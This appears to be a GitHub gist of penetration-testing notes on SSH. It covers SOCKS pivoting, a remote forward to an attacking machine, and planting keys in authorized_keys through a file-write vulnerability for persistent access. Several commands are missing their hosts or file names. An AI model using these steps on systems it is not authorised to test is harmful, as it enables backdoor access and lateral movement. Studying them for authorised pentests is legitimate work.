Skip to content

Instantly share code, notes, and snippets.

Last active August 31, 2021 14:56
What would you like to do?
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on that lets you pivot through the remote host (
#Command line:
ssh -D
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from
tsocks rdesktop
##SSH Remote Forward##
#The SSH server will be able to access TCP port 80 on (a host accessible from the SSH client) by connecting to on the SSH server.
#Command line:
ssh -R
#opens tunnel to on port 80 when you connect to your localhost on 8080 -- 443 is the port ssh is running on the attacking machine
ssh -l ryan -R 8080: -v -p 443
##SSH authorized_keys
#During a pentest or audit, you might want to add an authorized_keys file to let you log in using an SSH key.
#The authorized_keys file lives in a user’s home directory on the SSH server. It holds the public keys of the users allowed to log into that user’s account.
#Generate a public/private key pair like this:
ssh-keygen -f mykey
cat # you can copy this to authorized_keys
#If you want to shortest possible key (because your arbitrary-file-write vector is limited), do this:
ssh-keygen -f mykey -t rsa -b 768
cat # copy to authorized_key. Omit the trailing user@host if you need a shorter key.
#Connect to the target system like this (you need to know the username of the user you added an authorized key for):
ssh -i mykey user@
#Caveat: The authorized_keys file might not work if it’s writable by other users. If you already have shell access you can “chmod 600 ~/.ssh/authorized_keys”. However, if you’re remotely exploiting an arbitrary file-write vulnerability and happen to have a weak umask, you may have problems.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment